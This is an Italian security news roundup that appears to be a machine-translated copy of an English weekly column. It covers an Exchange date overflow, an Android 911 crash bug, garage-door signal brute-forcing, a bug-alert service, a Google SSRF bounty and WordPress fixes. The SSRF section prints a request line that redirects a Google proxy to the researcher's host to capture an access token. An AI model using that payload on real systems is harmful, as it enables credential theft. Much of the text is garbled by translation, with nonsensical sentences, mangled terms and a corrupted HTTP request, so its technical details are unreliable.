Questa settimana in sicurezza: Y2K22, bloccando involontariamente il 911, oltre a avviso di bug

Se avessi la sfortuna di eseguire un server di Microsoft Exchange la scorsa settimana, allora non mi requisito di parlarvi del problema Y2K22 . Per prendere il resto di noi, quando Exchange ha cercato di scaricare il primo aggiornamento delle definizioni dei malware del 2022, il numero di versione delle nuove definizioni ha attivato un incidente nel motore di rilevamento del malware. La data è rappresentata come String 2201010001, dove le prime due cifre rappresentano l’anno. Questa stringa viene convertita in un intero intero firmato, che consente di ottenere 2,147.483.647. Il numero intero trabocca, così come il risultato è un comportamento indefinito, schiantando il motore. Il server smette di funzionare, non elaborare alcun tipo di messaggi senza un motore di malware funzionante, il che implica che nessuna e-mail passa attraverso. Capodanno soddisfatto!

Android 911 Denial of Service

Composizione 911 Per i servizi di emergenza è molto il momento peggiore per un bug dell’applicazione software si manifestarsi. Google ha appena risolto un bug del genere nell’aggiornamento Android gennaio. È una di quelle strane interazioni involontarie di app – in questa situazione Microsoft Teams che attiva il bug Android. Se l’app Teams è installata, tuttavia nessun account ha effettuato l’accesso, le squadre producono e registrano un nuovo elemento foneaccount in ogni lancio. Sembra che dovrebbe essere raro, tuttavia le squadre su Android sono allo stesso modo noto per aver disconnesso l’individuo spontaneamente. Quando si compone il 911, Android esegue una routine per identificare quale foneaccount dovrebbe essere utilizzata per il percorso della chiamata, oltre a risolvere i legami confrontando gli hash. Quel confronto è solo una sottrazione ingenua, implica che c’è una possibilità del 50% nell’ottenere un risultato sfavorevole. Questo era obbligatorio, portando allo schianto.

Ingegneria reverse della porta del garage

Reverse Engineering Un piano di autorizzazione wireless di 30 anni potrebbe non essere il maggior interesse che afferra l’impresa, tuttavia in alcuni casi il viaggio è la sua ricompensa. [Maxwell Dulin] ci porta la storia, così come questo viaggio ne vale sicuramente la pena. Le basi di questo hack sono certamente ancora vitali, iniziando a dare un’occhiata all’hardware. La porta del garage viene sincronizzata con l’apriporta del garage tenendo un pulsante sul ricevitore mentre invia un codice. All’interno dell’osservatore, ci sono nove dip switch, ciascuno con tre posizioni. Cosa fanno? Tirò fuori il suo affidabile SDR per ottenere il traffico web e cercare di decodificare i segnali. Ispectrum e GNU Radio erano gli eroi qui, fornendo informazioni su questo semplice schema di autenticazione. Il pensiero finale su questa vera porta del garage? Puoi brutare forzare un codice sconosciuto inviando ogni possibile combo, nonché richiede solo 104 minuti.

Bugalert.

Se sei un sysadmin, capisci che alcuni problemi telefonici telefonici per azione istantanea. Se si eseguono server Java, la vulnerabilità LOG4J è stata una prova termini del tuo protocollo di reazione. Il tempo tra la divulgazione pubblica e ogni volta che ne hai sentito, potrebbe essere stato sufficiente per impostare il disastro. Mentre ci sono diversi servizi di segnalazione di bug e frameworks, non si adattano a questa nicchia, questa nicchia utilizza il caso: ti noti il ​​prima possibile che i tuoi capelli possano davvero essere in fiamme. Quella nicchia non riempita ha inseguito [Matteo Sullivan], che ha rivelato un nuovo progetto, avviso di bug. È tutto open source, quindi puoi tenere la tua istanza se vuoi veramente. Puoi scegliere di ottenere un tweet, un testo o anche la telefonata. Questo ha il potenziale strumento utile, dai un’occhiata!

Mi sento come se avessi bisogno di effettuare un avviso di errori impostato da uno strano strano canzone specifico …

La Zombie SSRF.

[David Schütz] stava cercando un’oscura di API di Google Apis, oltre a Works Jobs.Googleapis.com, che puoi dimostrarti. Quella demo è interessante, dal momento che non è un servizio completamente flash-out, tuttavia parla con il back-end genuino. Le richieste vanno con un proxy, cxl-services.appspot.com, che gestisce il passaggio di autenticazione per la pagina Demo. Se potrebbe interrompere un falso (SSRF) del lato server (SSRF), potrebbe essere in grado di ottenere le richieste autenticate, nonché forse tecnica il proxy nell’invio del traffico web per suo conto. L’analisi dell’URL è difficile. La tecnica che ha funzionato? Una barra rovesciata nell’URL. Get /Proxy?url=https://sfmnev.vps.xdavidhu.me\@jobs.googleapis.com/ http / 1.1

Con un guadagno di accesso al token in mano, [David] ha iniziato a controllare accuratamente altre API di Google per vedere cosa questo token lo ha fornito di accedere a. Fornisce l’avvertenza che abbiamo coperto prima, sii cauto esattamente quanto lontano tu spingi. Potrebbe aver segnalato il bug migliore, tuttavia desiderava verificare di aver davvero avuto un acquisto online di accesso al token. Dopo aver confermato il token aiutato a controllare l’accesso, ha trasformato nella ricerca, oltre a compensare un ottimo $ 3133,70, oltre ad altri $ 1000 per un grande rapporto e l’aspetto cauto al movimento laterale. Questo è tutto ciò che ce n’è, giusto? No. Poco prima del passare la scadenza della divulgazione di 90 giorni, [David] ha trovato un bypass di riparazione. addi.NG Qualsiasi tipo di testo tra la barra rovesciata e @ era sufficiente per romperlo. Un altro $ 3133.70. Solo per divertimento, ha sondato i vecchi URL, che non dovrebbe essere in servizio dopo la correzione. Sì, ha scoperto ancora un altro token di sicurezza e sicurezza, oltre a comprimere $ 3133,70. Questo Zombie SSRF non è ancora morto, come evidenziato su Twitter:

Aggiornamento WordPress.

Se non hai impostato automaticamente l’istanza di WordPress per l’aggiornamento, è il momento di ispezionare per la versione più recente. Ci sono quattro problemi potenzialmente dannosi qui, anche se i dettagli sono scarsi a questo punto. Molto in primo luogo è una vulnerabilità di scripting incrociata nelle lumache di pubblicazione, la parte dell’URL che corrisponde al nome di pubblicazione. Il secondo problema discusso è l’iniezione dell’articolo in alcune configurazioni multite. Le ultime due vulnerabilità sono iniezioni SQL, certamente meritevoli del “che anno è?” meme.

Leave a Reply

Your email address will not be published. Required fields are marked *